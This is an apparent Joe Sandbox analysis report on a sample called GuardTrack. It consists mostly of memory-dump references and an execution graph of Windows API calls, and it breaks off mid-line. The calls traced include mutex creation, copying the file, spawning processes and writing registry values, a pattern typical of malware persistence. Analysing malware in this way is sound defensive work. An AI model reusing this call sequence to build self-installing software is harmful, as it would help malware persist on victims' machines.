                                                          • Source File: 00000013.00000002.2086620699.00000000005B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 005B0000, based on PE: true
                                                          • Associated: 00000013.00000002.2086601826.00000000005B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086673659.0000000000640000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086673659.0000000000666000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086724166.0000000000670000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086756286.0000000000679000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_19_2_5b0000_GuardTrack.jbxd
                                                          Similarity
                                                          • API ID: FindMessagePostSleepWindow
                                                          • String ID: Shell_TrayWnd
                                                          • API String ID: 529655941-2988720461
                                                          • Opcode ID: f42329cf9ba8fad0a066f05f11080331d2275972893d652e84a17621e0da5e10
                                                          • Instruction ID: 0da580243d7dab594e55cb41ba0fc4838b266af4d582bc9fd4f00dff1d7492f8
                                                          • Opcode Fuzzy Hash: f42329cf9ba8fad0a066f05f11080331d2275972893d652e84a17621e0da5e10
                                                          • Instruction Fuzzy Hash: 30D0C936384321FAF768A7709C5BFD6AA16AB42B50F051829B36AAA1D0C9F058508698

                                                          Execution Graph

                                                          Execution Coverage:4.3%
                                                          Dynamic/Decrypted Code Coverage:0%
                                                          Signature Coverage:1.2%
                                                          Total number of Nodes:1126
                                                          Total number of Limit Nodes:8
                                                          execution_graph 28002 cbcac9 30 API calls 2 library calls 26646 cafec9 26647 cafed5 __FrameHandler3::FrameUnwindToState 26646->26647 26671 cb00cb 26647->26671 26649 cafedc 26650 cb0035 26649->26650 26660 caff06 ___scrt_is_nonwritable_in_current_image __FrameHandler3::FrameUnwindToState ___scrt_release_startup_lock 26649->26660 26687 cb0594 4 API calls 2 library calls 26650->26687 26652 cb003c 26653 cb0042 26652->26653 26688 cb585e 26652->26688 26691 cb5822 23 API calls __FrameHandler3::FrameUnwindToState 26653->26691 26656 cb004a 26657 caff25 26658 caffa6 26679 cb90dc 26658->26679 26660->26657 26660->26658 26683 cb5838 37 API calls 3 library calls 26660->26683 26662 caffac 26663 caffc3 26662->26663 26684 cb06b4 GetModuleHandleW 26663->26684 26665 caffcd 26665->26652 26666 caffd1 26665->26666 26667 caffda 26666->26667 26685 cb5813 23 API calls __FrameHandler3::FrameUnwindToState 26666->26685 26686 cb023c 73 API calls ___scrt_uninitialize_crt 26667->26686 26670 caffe3 26670->26657 26672 cb00d4 26671->26672 26692 cafc33 IsProcessorFeaturePresent 26672->26692 26674 cb00e0 26693 cb2a1e 10 API calls 2 library calls 26674->26693 26676 cb00e5 26677 cb00e9 26676->26677 26694 cb2a3d 7 API calls 2 library calls 26676->26694 26677->26649 26680 cb90e5 26679->26680 26682 cb90ea 26679->26682 26695 cb8e40 49 API calls 26680->26695 26682->26662 26683->26658 26684->26665 26685->26667 26686->26670 26687->26652 26696 cb56fc 26688->26696 26691->26656 26692->26674 26693->26676 26694->26677 26695->26682 26697 cb570a 26696->26697 26698 cb571c 26696->26698 26724 cb06b4 GetModuleHandleW 26697->26724 26708 cb55a3 26698->26708 26701 cb570f 26701->26698 26725 cb57a2 GetModuleHandleExW 26701->26725 26703 cb5755 26703->26653 26706 cb575f 26709 cb55af __FrameHandler3::FrameUnwindToState 26708->26709 26731 cb716d EnterCriticalSection 26709->26731 26711 cb55b9 26732 cb560f 26711->26732 26713 cb55c6 26736 cb55e4 26713->26736 26716 cb5760 26741 cbf0dd GetPEB 26716->26741 26719 cb578f 26722 cb57a2 __FrameHandler3::FrameUnwindToState 3 API calls 26719->26722 26720 cb576f GetPEB 26720->26719 26721 cb577f GetCurrentProcess TerminateProcess 26720->26721 26721->26719 26723 cb5797 ExitProcess 26722->26723 26724->26701 26726 cb57c1 GetProcAddress 26725->26726 26727 cb57e4 26725->26727 26728 cb57d6 26726->26728 26729 cb57ea FreeLibrary 26727->26729 26730 cb571b 26727->26730 26728->26727 26729->26730 26730->26698 26731->26711 26733 cb561b __FrameHandler3::FrameUnwindToState 26732->26733 26735 cb567c __FrameHandler3::FrameUnwindToState 26733->26735 26739 cbacf9 14 API calls __FrameHandler3::FrameUnwindToState 26733->26739 26735->26713 26740 cb71b5 LeaveCriticalSection 26736->26740 26738 cb55d2 26738->26703 26738->26716 26739->26735 26740->26738 26742 cbf0f7 26741->26742 26743 cb576a 26741->26743 26745 cbc34e 5 API calls std::_Locinfo::_Locinfo_ctor 26742->26745 26743->26719 26743->26720 26745->26743 28004 cc36c5 44 API calls 3 library calls 28093 c911c0 26 API calls ___std_exception_copy 28005 ca36c0 49 API calls 5 library calls 28007 cb28c0 6 API calls 3 library calls 28095 cbaddf 7 API calls ___scrt_uninitialize_crt 28096 c939d0 27 API calls 28097 c9a3d0 25 API calls 28099 c937d0 43 API calls std::_Throw_Cpp_error 28102 cb41ea 71 API calls 2 library calls 28012 caf8e2 41 API calls 28108 cbd9fd 39 API calls 3 library calls 28109 cbbdfc 16 API calls __dosmaperr 26746 ca8c8f 26748 ca8cad 26746->26748 27062 c94740 26748->27062 26750 c94740 std::_Throw_Cpp_error 43 API calls 26751 ca9013 26750->26751 27066 c99390 26751->27066 26753 ca902c 26754 c94740 std::_Throw_Cpp_error 43 API calls 26753->26754 26755 ca9086 26754->26755 27077 c91290 26755->27077 26757 ca909d 26758 c91290 std::_Throw_Cpp_error 25 API calls 26757->26758 26759 ca90a8 26758->26759 26760 c91290 std::_Throw_Cpp_error 25 API calls 26759->26760 26761 ca90b3 26760->26761 26762 c91290 std::_Throw_Cpp_error 25 API calls 26761->26762 26765 ca90be 26762->26765 26763 c94740 std::_Throw_Cpp_error 43 API calls 26767 ca9283 26763->26767 26764 c94740 std::_Throw_Cpp_error 43 API calls 26766 ca9453 26764->26766 26765->26763 26768 c99390 47 API calls 26766->26768 26767->26764 26767->26767 26769 ca946c 26768->26769 26770 c94740 std::_Throw_Cpp_error 43 API calls 26769->26770 26771 ca94c6 26770->26771 26772 c91290 std::_Throw_Cpp_error 25 API calls 26771->26772 26773 ca94dd 26772->26773 26774 c91290 std::_Throw_Cpp_error 25 API calls 26773->26774 26775 ca94e8 26774->26775 26776 c91290 std::_Throw_Cpp_error 25 API calls 26775->26776 26777 ca94f3 26776->26777 26778 c91290 std::_Throw_Cpp_error 25 API calls 26777->26778 26781 ca94fe 26778->26781 26779 c94740 std::_Throw_Cpp_error 43 API calls 26782 ca96c3 26779->26782 26780 c94740 std::_Throw_Cpp_error 43 API calls 26783 ca9893 26780->26783 26781->26779 26782->26780 26782->26782 26784 c99390 47 API calls 26783->26784 26785 ca98ac 26784->26785 26786 c94740 std::_Throw_Cpp_error 43 API calls 26785->26786 26787 ca9908 26786->26787 26788 c91290 std::_Throw_Cpp_error 25 API calls 26787->26788 26789 ca991f 26788->26789 26790 c91290 std::_Throw_Cpp_error 25 API calls 26789->26790 26791 ca992a 26790->26791 26792 c91290 std::_Throw_Cpp_error 25 API calls 26791->26792 26793 ca9935 26792->26793 26794 c91290 std::_Throw_Cpp_error 25 API calls 26793->26794 26796 ca9940 26794->26796 26795 c94740 std::_Throw_Cpp_error 43 API calls 26798 ca9b04 26795->26798 26796->26795 26797 c94740 std::_Throw_Cpp_error 43 API calls 26799 ca9cd3 26797->26799 26798->26797 26798->26798 26800 c99390 47 API calls 26799->26800 26801 ca9cec 26800->26801 26802 c94740 std::_Throw_Cpp_error 43 API calls 26801->26802 26803 ca9dd9 26802->26803 26804 c91290 std::_Throw_Cpp_error 25 API calls 26803->26804 26805 ca9df0 26804->26805 26806 c91290 std::_Throw_Cpp_error 25 API calls 26805->26806 26807 ca9dfb 26806->26807 26808 c91290 std::_Throw_Cpp_error 25 API calls 26807->26808 26809 ca9e06 26808->26809 26810 c91290 std::_Throw_Cpp_error 25 API calls 26809->26810 26813 ca9e11 26810->26813 26811 c94740 std::_Throw_Cpp_error 43 API calls 26815 ca9fe3 26811->26815 26812 c94740 std::_Throw_Cpp_error 43 API calls 26814 caa1b3 26812->26814 26813->26811 26816 c99390 47 API calls 26814->26816 26815->26812 26815->26815 26817 caa1cc 26816->26817 26818 c94740 std::_Throw_Cpp_error 43 API calls 26817->26818 26819 caa226 26818->26819 26820 c91290 std::_Throw_Cpp_error 25 API calls 26819->26820 26821 caa23d 26820->26821 26822 c91290 std::_Throw_Cpp_error 25 API calls 26821->26822 26823 caa248 26822->26823 26824 c91290 std::_Throw_Cpp_error 25 API calls 26823->26824 26825 caa253 26824->26825 26826 c91290 std::_Throw_Cpp_error 25 API calls 26825->26826 26829 caa25e 26826->26829 26827 c94740 std::_Throw_Cpp_error 43 API calls 26828 caa433 26827->26828 26830 c94740 std::_Throw_Cpp_error 43 API calls 26828->26830 26829->26827 26831 caa603 26830->26831 26832 c99390 47 API calls 26831->26832 26834 caa61e 26832->26834 26833 c94740 std::_Throw_Cpp_error 43 API calls 26835 caa7c6 26833->26835 26834->26833 26834->26834 26836 c91290 std::_Throw_Cpp_error 25 API calls 26835->26836 26837 caa7de 26836->26837 26838 c91290 std::_Throw_Cpp_error 25 API calls 26837->26838 26839 caa7e9 26838->26839 26840 c91290 std::_Throw_Cpp_error 25 API calls 26839->26840 26841 caa7f4 26840->26841 26842 c91290 std::_Throw_Cpp_error 25 API calls 26841->26842 26843 caa7ff 26842->26843 26843->26843 26844 c94740 std::_Throw_Cpp_error 43 API calls 26843->26844 26845 caa9d3 26844->26845 26846 c94740 std::_Throw_Cpp_error 43 API calls 26845->26846 26847 caaba3 26846->26847 26848 c99390 47 API calls 26847->26848 26850 caabbe 26848->26850 26849 c94740 std::_Throw_Cpp_error 43 API calls 26851 caad66 26849->26851 26850->26849 26850->26850 26852 c91290 std::_Throw_Cpp_error 25 API calls 26851->26852 26853 caad7e 26852->26853 26854 c91290 std::_Throw_Cpp_error 25 API calls 26853->26854 26855 caad89 26854->26855 26856 c91290 std::_Throw_Cpp_error 25 API calls 26855->26856 26857 caad94 26856->26857 26858 c91290 std::_Throw_Cpp_error 25 API calls 26857->26858 26860 caad9f 26858->26860 26859 c94740 std::_Throw_Cpp_error 43 API calls 26862 caaf73 26859->26862 26860->26859 26860->26860 26861 caade0 26860->26861 26863 c94740 std::_Throw_Cpp_error 43 API calls 26862->26863 26864 cab143 26863->26864 26865 c99390 47 API calls 26864->26865 26868 cab15e 26865->26868 26866 c94740 std::_Throw_Cpp_error 43 API calls 26867 cab306 26866->26867 26869 c91290 std::_Throw_Cpp_error 25 API calls 26867->26869 26868->26866 26868->26868 26870 cab31e 26869->26870 26871 c91290 std::_Throw_Cpp_error 25 API calls 26870->26871 26872 cab329 26871->26872 26873 c91290 std::_Throw_Cpp_error 25 API calls 26872->26873 26874 cab334 26873->26874 26875 c91290 std::_Throw_Cpp_error 25 API calls 26874->26875 26877 cab33f 26875->26877 26876 cab8e0 GetModuleHandleA 26876->26877 26877->26876 26878 cab904 GetVersion 26877->26878 26879 cab965 26878->26879 26879->26879 26880 c94740 std::_Throw_Cpp_error 43 API calls 26879->26880 26881 cabaf3 26880->26881 26882 c94740 std::_Throw_Cpp_error 43 API calls 26881->26882 26884 cabcd3 26882->26884 26883 c94740 std::_Throw_Cpp_error 43 API calls 26885 cabe83 26883->26885 26884->26883 27084 c96620 26885->27084 26889 cabe8f 27233 cb709b 30 API calls 3 library calls 26889->27233 26892 cabebf 26893 cae30e 26892->26893 26894 cabed0 26892->26894 27290 caf03b 43 API calls std::_Throw_Cpp_error 26893->27290 27234 c9caf0 109 API calls 3 library calls 26894->27234 26898 cabedc 27235 ca3da0 GetUserNameA 26898->27235 26900 cabee8 27242 ca3c30 44 API calls std::_Throw_Cpp_error 26900->27242 26902 cabef4 26903 c94740 std::_Throw_Cpp_error 43 API calls 26902->26903 26905 cac083 26903->26905 26904 c94740 std::_Throw_Cpp_error 43 API calls 26906 cac263 26904->26906 26905->26904 26907 c99390 47 API calls 26906->26907 26908 cac27e 26907->26908 26909 c91290 std::_Throw_Cpp_error 25 API calls 26908->26909 26910 cac28c 26909->26910 26911 c91290 std::_Throw_Cpp_error 25 API calls 26910->26911 26912 cac297 26911->26912 26913 c94740 std::_Throw_Cpp_error 43 API calls 26912->26913 26914 cac453 26913->26914 26915 c94740 std::_Throw_Cpp_error 43 API calls 26914->26915 26916 cac4b6 26915->26916 27243 ca47c0 27 API calls 3 library calls 26916->27243 26918 cac4c6 27244 ca2a30 27 API calls 5 library calls 26918->27244 26920 cac4d3 26921 c94740 std::_Throw_Cpp_error 43 API calls 26920->26921 26922 cac536 26921->26922 26923 c94740 std::_Throw_Cpp_error 43 API calls 26922->26923 26924 cac59e 26923->26924 27245 ca47c0 27 API calls 3 library calls 26924->27245 26926 cac5ab 27246 ca2a30 27 API calls 5 library calls 26926->27246 26928 cac5b8 26929 c94740 std::_Throw_Cpp_error 43 API calls 26928->26929 26930 cac619 26929->26930 26931 c94740 std::_Throw_Cpp_error 43 API calls 26930->26931 26932 cac658 26930->26932 26933 cac68d 26931->26933 27247 ca47c0 27 API calls 3 library calls 26933->27247 26935 cac69a 27248 ca2a30 27 API calls 5 library calls 26935->27248 26937 cac6a7 26938 c94740 std::_Throw_Cpp_error 43 API calls 26937->26938 26939 cac70c 26938->26939 26940 c94740 std::_Throw_Cpp_error 43 API calls 26939->26940 26941 cac77d 26940->26941 27249 ca47c0 27 API calls 3 library calls 26941->27249 26943 cac78a 27250 ca2a30 27 API calls 5 library calls 26943->27250 26945 cac797 26946 c94740 std::_Throw_Cpp_error 43 API calls 26945->26946 26947 cac7ea 26946->26947 26948 c94740 std::_Throw_Cpp_error 43 API calls 26947->26948 26949 cac84f 26948->26949 27251 ca47c0 27 API calls 3 library calls 26949->27251 26951 cac85c 27252 ca2a30 27 API calls 5 library calls 26951->27252 26953 cac869 26954 c94740 std::_Throw_Cpp_error 43 API calls 26953->26954 26955 cac8bc 26954->26955 27253 c96440 26955->27253 26957 cac8ce 26958 c96440 27 API calls 26957->26958 26959 cac8e6 26958->26959 26960 c96440 27 API calls 26959->26960 26961 cac8fb 26960->26961 26962 c96440 27 API calls 26961->26962 26963 cac913 26962->26963 26964 c96440 27 API calls 26963->26964 26965 cac92e 26964->26965 26966 c96440 27 API calls 26965->26966 26967 cac949 26966->26967 26968 c96440 27 API calls 26967->26968 26969 cac964 26968->26969 26970 c96440 27 API calls 26969->26970 26971 cac97f 26970->26971 26972 c96440 27 API calls 26971->26972 26973 cac997 26972->26973 26974 c91290 std::_Throw_Cpp_error 25 API calls 26973->26974 26975 cac9a2 26974->26975 26976 c91290 std::_Throw_Cpp_error 25 API calls 26975->26976 26977 cac9ad 26976->26977 26978 c91290 std::_Throw_Cpp_error 25 API calls 26977->26978 26979 cac9b8 26978->26979 26980 c91290 std::_Throw_Cpp_error 25 API calls 26979->26980 26981 cac9c3 26980->26981 26982 c91290 std::_Throw_Cpp_error 25 API calls 26981->26982 26983 cac9ce 26982->26983 26984 c91290 std::_Throw_Cpp_error 25 API calls 26983->26984 26985 cac9d6 26984->26985 26986 c91290 std::_Throw_Cpp_error 25 API calls 26985->26986 26987 cac9e1 26986->26987 26988 c91290 std::_Throw_Cpp_error 25 API calls 26987->26988 26989 cac9ec 26988->26989 26990 c91290 std::_Throw_Cpp_error 25 API calls 26989->26990 26991 cac9f7 26990->26991 26992 c91290 std::_Throw_Cpp_error 25 API calls 26991->26992 26993 caca02 26992->26993 26994 c91290 std::_Throw_Cpp_error 25 API calls 26993->26994 26995 caca0d 26994->26995 26996 c91290 std::_Throw_Cpp_error 25 API calls 26995->26996 26997 caca18 26996->26997 26998 c91290 std::_Throw_Cpp_error 25 API calls 26997->26998 26999 caca23 26998->26999 27000 c91290 std::_Throw_Cpp_error 25 API calls 26999->27000 27001 caca2e 27000->27001 27002 c91290 std::_Throw_Cpp_error 25 API calls 27001->27002 27003 caca39 27002->27003 27004 c91290 std::_Throw_Cpp_error 25 API calls 27003->27004 27005 caca44 27004->27005 27006 c91290 std::_Throw_Cpp_error 25 API calls 27005->27006 27007 caca4f 27006->27007 27008 c91290 std::_Throw_Cpp_error 25 API calls 27007->27008 27009 caca5a 27008->27009 27010 c91290 std::_Throw_Cpp_error 25 API calls 27009->27010 27011 caca65 27010->27011 27012 c91290 std::_Throw_Cpp_error 25 API calls 27011->27012 27013 caca70 27012->27013 27014 c91290 std::_Throw_Cpp_error 25 API calls 27013->27014 27015 caca7b 27014->27015 27016 c91290 std::_Throw_Cpp_error 25 API calls 27015->27016 27017 caca86 27016->27017 27018 c91290 std::_Throw_Cpp_error 25 API calls 27017->27018 27019 caca91 27018->27019 27020 c91290 std::_Throw_Cpp_error 25 API calls 27019->27020 27021 caca9c 27020->27021 27022 c91290 std::_Throw_Cpp_error 25 API calls 27021->27022 27023 cacaa7 27022->27023 27024 c91290 std::_Throw_Cpp_error 25 API calls 27023->27024 27025 cacab2 27024->27025 27026 c91290 std::_Throw_Cpp_error 25 API calls 27025->27026 27027 cacabd 27026->27027 27028 c91290 std::_Throw_Cpp_error 25 API calls 27027->27028 27029 cacac8 27028->27029 27030 c91290 std::_Throw_Cpp_error 25 API calls 27029->27030 27032 cacad3 27030->27032 27033 caccf3 27032->27033 27034 c91290 std::_Throw_Cpp_error 25 API calls 27032->27034 27262 c91820 27032->27262 27060 cacd0e _Yarn 27033->27060 27279 c917c0 16 API calls std::_Facet_Register 27033->27279 27034->27032 27036 c9bc80 16 API calls 27036->27060 27037 c94740 43 API calls std::_Throw_Cpp_error 27037->27060 27038 c95610 26 API calls std::invalid_argument::invalid_argument 27038->27060 27040 cae204 Sleep 27289 c9c130 25 API calls 2 library calls 27040->27289 27041 cb0a90 RaiseException std::_Throw_Cpp_error 27041->27060 27046 c994d0 39 API calls 27046->27060 27050 c9e8a0 33 API calls 27050->27060 27051 ca47c0 27 API calls 27051->27060 27052 ca2a30 27 API calls 27052->27060 27054 c9a370 27 API calls 27054->27060 27055 c963c0 27 API calls 27055->27060 27056 c91290 25 API calls std::_Throw_Cpp_error 27056->27060 27057 c929c0 118 API calls 27057->27060 27059 c95880 49 API calls 27059->27060 27060->27036 27060->27037 27060->27038 27060->27040 27060->27041 27060->27046 27060->27050 27060->27051 27060->27052 27060->27054 27060->27055 27060->27056 27060->27057 27060->27059 27061 cb585e 23 API calls 27060->27061 27280 c96360 43 API calls std::_Throw_Cpp_error 27060->27280 27281 ca4620 27 API calls 27060->27281 27282 ca3f10 27 API calls 5 library calls 27060->27282 27283 ca50b0 43 API calls 2 library calls 27060->27283 27284 c956b0 50 API calls 3 library calls 27060->27284 27285 c94780 59 API calls 3 library calls 27060->27285 27286 c9c0e0 25 API calls 2 library calls 27060->27286 27287 c91330 53 API calls __wsopen_s 27060->27287 27288 c9c130 25 API calls 2 library calls 27060->27288 27061->27060 27063 c94763 27062->27063 27063->27063 27064 c91820 std::_Throw_Cpp_error 43 API calls 27063->27064 27065 c94775 27064->27065 27065->26750 27067 c993a8 RegOpenKeyExA 27066->27067 27068 c993a6 27066->27068 27069 c993fb 27067->27069 27070 c993c3 RegQueryValueExA 27067->27070 27068->27067 27069->26753 27072 c993f5 RegCloseKey 27070->27072 27073 c99416 RegCloseKey 27070->27073 27072->27069 27074 c99440 27073->27074 27074->27074 27075 c91820 std::_Throw_Cpp_error 43 API calls 27074->27075 27076 c99458 27075->27076 27076->26753 27078 c9129b 27077->27078 27080 c912b6 std::ios_base::_Ios_base_dtor 27077->27080 27078->27080 27291 cb3faf 25 API calls 2 library calls 27078->27291 27080->26757 27085 c9667e 27084->27085 27085->27085 27086 c91820 std::_Throw_Cpp_error 43 API calls 27085->27086 27087 c967e9 27086->27087 27292 c991b0 27087->27292 27089 c967fa CreateMutexA 27091 c9683a std::ios_base::_Ios_base_dtor 27089->27091 27090 c968ac GetLastError 27094 c968bd GetEnvironmentVariableA 27090->27094 27095 c9838c 27090->27095 27091->27090 27092 c98387 27091->27092 27093 c968a2 std::ios_base::_Ios_base_dtor 27091->27093 27331 cb3faf 25 API calls 2 library calls 27092->27331 27093->27090 27099 c96908 27094->27099 27097 cb585e 23 API calls 27095->27097 27098 c98393 27097->27098 27332 cb3faf 25 API calls 2 library calls 27098->27332 27099->27099 27102 c91820 std::_Throw_Cpp_error 43 API calls 27099->27102 27101 c94740 std::_Throw_Cpp_error 43 API calls 27103 c983bd 27101->27103 27104 c96a7d 27102->27104 27324 c963e0 27103->27324 27108 c91820 std::_Throw_Cpp_error 43 API calls 27104->27108 27110 c96ab9 27108->27110 27109 c983ea 27112 c983f4 ShellExecuteA 27109->27112 27305 c93190 27110->27305 27114 c91290 std::_Throw_Cpp_error 25 API calls 27112->27114 27113 c96ac8 27115 c96440 27 API calls 27113->27115 27116 c9840d 27114->27116 27121 c96b00 std::ios_base::_Ios_base_dtor 27115->27121 27117 c91290 std::_Throw_Cpp_error 25 API calls 27116->27117 27118 c98418 27117->27118 27120 c91290 std::_Throw_Cpp_error 25 API calls 27118->27120 27119 c96bae CreateDirectoryA GetModuleFileNameA 27127 c96c03 27119->27127 27123 c98423 27120->27123 27121->27098 27121->27119 27122 c96ba4 std::ios_base::_Ios_base_dtor 27121->27122 27122->27119 27124 c91290 std::_Throw_Cpp_error 25 API calls 27123->27124 27125 c9842b 27124->27125 27126 cb585e 23 API calls 27125->27126 27128 c98432 27126->27128 27129 c91820 std::_Throw_Cpp_error 43 API calls 27127->27129 27333 cb3faf 25 API calls 2 library calls 27128->27333 27132 c96c69 27129->27132 27134 c91820 std::_Throw_Cpp_error 43 API calls 27132->27134 27135 c96cd8 27134->27135 27137 c991b0 27 API calls 27135->27137 27139 c96cfd 27137->27139 27140 c96440 27 API calls 27139->27140 27141 c96d35 CopyFileA 27140->27141 27147 c96d58 std::ios_base::_Ios_base_dtor 27141->27147 27147->27147 27148 c91820 std::_Throw_Cpp_error 43 API calls 27147->27148 27150 c96ec8 27148->27150 27151 c91820 std::_Throw_Cpp_error 43 API calls 27150->27151 27152 c96f38 27151->27152 27153 c991b0 27 API calls 27152->27153 27154 c96f5d 27153->27154 27155 c96440 27 API calls 27154->27155 27156 c96f9e 27155->27156 27156->27156 27157 c91820 std::_Throw_Cpp_error 43 API calls 27156->27157 27158 c97029 27157->27158 27158->27158 27159 c91820 std::_Throw_Cpp_error 43 API calls 27158->27159 27161 c970b9 27159->27161 27163 c91820 std::_Throw_Cpp_error 43 API calls 27161->27163 27164 c972a4 27163->27164 27166 c96440 27 API calls 27164->27166 27167 c972c0 27166->27167 27168 c96440 27 API calls 27167->27168 27169 c972dc 27168->27169 27170 c96440 27 API calls 27169->27170 27171 c972f5 27170->27171 27172 c93190 std::_Throw_Cpp_error 27 API calls 27171->27172 27175 c97304 std::ios_base::_Ios_base_dtor __fread_nolock 27172->27175 27176 c975a6 CreateProcessA 27175->27176 27177 c975f4 WaitForSingleObject CloseHandle CloseHandle 27176->27177 27180 c97618 27176->27180 27177->27180 27181 c91820 std::_Throw_Cpp_error 43 API calls 27180->27181 27182 c9779b 27181->27182 27183 c91820 std::_Throw_Cpp_error 43 API calls 27182->27183 27184 c979a9 27183->27184 27316 c99460 27184->27316 27186 c979c8 std::ios_base::_Ios_base_dtor 27187 c91820 std::_Throw_Cpp_error 43 API calls 27186->27187 27188 c97ac8 27187->27188 27189 c91820 std::_Throw_Cpp_error 43 API calls 27188->27189 27190 c97b38 27189->27190 27191 c991b0 27 API calls 27190->27191 27192 c97b5d 27191->27192 27193 c96440 27 API calls 27192->27193 27194 c97b9e 27193->27194 27194->27194 27195 c91820 std::_Throw_Cpp_error 43 API calls 27194->27195 27196 c97c29 27195->27196 27197 c91820 std::_Throw_Cpp_error 43 API calls 27196->27197 27198 c97e19 27197->27198 27199 c99460 4 API calls 27198->27199 27200 c97e41 std::ios_base::_Ios_base_dtor 27199->27200 27201 c91290 std::_Throw_Cpp_error 25 API calls 27200->27201 27202 c97eea std::ios_base::_Ios_base_dtor 27201->27202 27203 c91820 std::_Throw_Cpp_error 43 API calls 27202->27203 27204 c97fe1 27203->27204 27204->27204 27205 c91820 std::_Throw_Cpp_error 43 API calls 27204->27205 27206 c9805d 27205->27206 27207 c91820 std::_Throw_Cpp_error 43 API calls 27206->27207 27208 c980c8 27207->27208 27209 c963e0 27 API calls 27208->27209 27210 c980df 27209->27210 27211 c96440 27 API calls 27210->27211 27215 c980f5 27211->27215 27212 c91290 std::_Throw_Cpp_error 25 API calls 27213 c981a8 27212->27213 27214 c91290 std::_Throw_Cpp_error 25 API calls 27213->27214 27217 c981b3 std::ios_base::_Ios_base_dtor 27214->27217 27215->27212 27216 c9831c 27216->27128 27218 c9834c std::ios_base::_Ios_base_dtor 27216->27218 27217->27216 27220 c9827c 27217->27220 27219 c91290 std::_Throw_Cpp_error 25 API calls 27218->27219 27221 c9837c 27219->27221 27222 c94740 std::_Throw_Cpp_error 43 API calls 27220->27222 27224 cafb9c 27221->27224 27223 c982cf 27222->27223 27223->27101 27227 cafba1 27224->27227 27226 cafbbb 27226->26889 27227->27226 27230 c91790 Concurrency::cancel_current_task 27227->27230 27341 cb71e3 27227->27341 27351 cb88d8 EnterCriticalSection LeaveCriticalSection std::_Facet_Register 27227->27351 27229 cafbc7 27229->27229 27230->27229 27350 cb0a90 RaiseException 27230->27350 27232 c917ac 27233->26892 27354 cb6f3f 45 API calls 2 library calls 27233->27354 27234->26898 27236 ca3dfc 27235->27236 27237 ca3dc0 27235->27237 27239 c91820 std::_Throw_Cpp_error 43 API calls 27236->27239 27238 c91820 std::_Throw_Cpp_error 43 API calls 27237->27238 27240 ca3df5 27238->27240 27241 ca3f05 27239->27241 27240->26900 27241->26900 27242->26902 27243->26918 27244->26920 27245->26926 27246->26928 27247->26935 27248->26937 27249->26943 27250->26945 27251->26951 27252->26953 27254 c96483 27253->27254 27255 c96548 27254->27255 27256 c965c0 27254->27256 27260 c96488 _Yarn 27254->27260 27355 c917c0 16 API calls std::_Facet_Register 27255->27355 27356 c917b0 27 API calls std::_Throw_Cpp_error 27256->27356 27260->26957 27261 c96572 _Yarn 27261->26957 27265 c9185e 27262->27265 27267 c91836 _Yarn 27262->27267 27263 c91907 27359 c917b0 27 API calls std::_Throw_Cpp_error 27263->27359 27265->27263 27357 c917c0 16 API calls std::_Facet_Register 27265->27357 27267->27032 27270 c918a7 _Yarn 27271 c918e9 std::ios_base::_Ios_base_dtor 27270->27271 27358 cb3faf 25 API calls 2 library calls 27270->27358 27271->27032 27279->27060 27280->27060 27281->27060 27282->27060 27283->27060 27284->27060 27285->27060 27286->27060 27287->27060 27288->27060 27289->27060 27293 c991c9 27292->27293 27294 c99380 27292->27294 27296 c99385 27293->27296 27297 c99277 27293->27297 27303 c991de _Yarn 27293->27303 27335 c962c0 27 API calls 27294->27335 27336 c917b0 27 API calls std::_Throw_Cpp_error 27296->27336 27334 c917c0 16 API calls std::_Facet_Register 27297->27334 27299 c992be _Yarn 27304 c9932f std::ios_base::_Ios_base_dtor _Yarn 27299->27304 27337 cb3faf 25 API calls 2 library calls 27299->27337 27303->27089 27304->27089 27306 c931df 27305->27306 27310 c931b2 _Yarn 27305->27310 27307 c932db 27306->27307 27308 c931ee 27306->27308 27339 c917b0 27 API calls std::_Throw_Cpp_error 27307->27339 27338 c917c0 16 API calls std::_Facet_Register 27308->27338 27310->27113 27314 c93235 _Yarn 27315 c93292 std::ios_base::_Ios_base_dtor _Yarn 27314->27315 27340 cb3faf 25 API calls 2 library calls 27314->27340 27315->27113 27317 c9946c 27316->27317 27318 c9946e RegOpenKeyExA 27316->27318 27317->27318 27319 c994bc 27318->27319 27320 c99486 RegSetValueExA 27318->27320 27319->27186 27322 c994c0 RegCloseKey 27320->27322 27323 c994b6 RegCloseKey 27320->27323 27322->27186 27323->27319 27325 c963ef 27324->27325 27326 c991b0 27 API calls 27325->27326 27327 c963fd 27326->27327 27328 c963c0 27327->27328 27329 c96440 27 API calls 27328->27329 27330 c963d4 27329->27330 27330->27109 27334->27299 27338->27314 27342 cbfadd 27341->27342 27343 cbfb1b 27342->27343 27344 cbfb06 HeapAlloc 27342->27344 27348 cbfaef __Getctype 27342->27348 27353 cb7c86 14 API calls __dosmaperr 27343->27353 27346 cbfb19 27344->27346 27344->27348 27347 cbfb20 27346->27347 27347->27227 27348->27343 27348->27344 27352 cb88d8 EnterCriticalSection LeaveCriticalSection std::_Facet_Register 27348->27352 27350->27232 27351->27227 27352->27348 27353->27347 27355->27261 27357->27270 28021 c9108c std::_Init_wcout::_Init_wcout 28022 caa880 233 API calls 4 library calls 28112 c9a980 45 API calls 2 library calls 28113 c93d80 29 API calls 3 library calls 28114 c93780 68 API calls 27785 cc1887 27790 cc165d 27785->27790 27789 cc18c6 27791 cc167c 27790->27791 27792 cc168f 27791->27792 27800 cc16a4 27791->27800 27810 cb7c86 14 API calls __dosmaperr 27792->27810 27794 cc1694 27811 cb3f9f 25 API calls __wsopen_s 27794->27811 27796 cc169f 27796->27789 27807 cc9eef 27796->27807 27798 cc1875 27816 cb3f9f 25 API calls __wsopen_s 27798->27816 27805 cc17c4 27800->27805 27812 cc78aa 37 API calls 3 library calls 27800->27812 27802 cc1814 27802->27805 27813 cc78aa 37 API calls 3 library calls 27802->27813 27804 cc1832 27804->27805 27814 cc78aa 37 API calls 3 library calls 27804->27814 27805->27796 27815 cb7c86 14 API calls __dosmaperr 27805->27815 27817 cc98b4 27807->27817 27810->27794 27811->27796 27812->27802 27813->27804 27814->27805 27815->27798 27816->27796 27819 cc98c0 __FrameHandler3::FrameUnwindToState 27817->27819 27818 cc98c7 27837 cb7c86 14 API calls __dosmaperr 27818->27837 27819->27818 27821 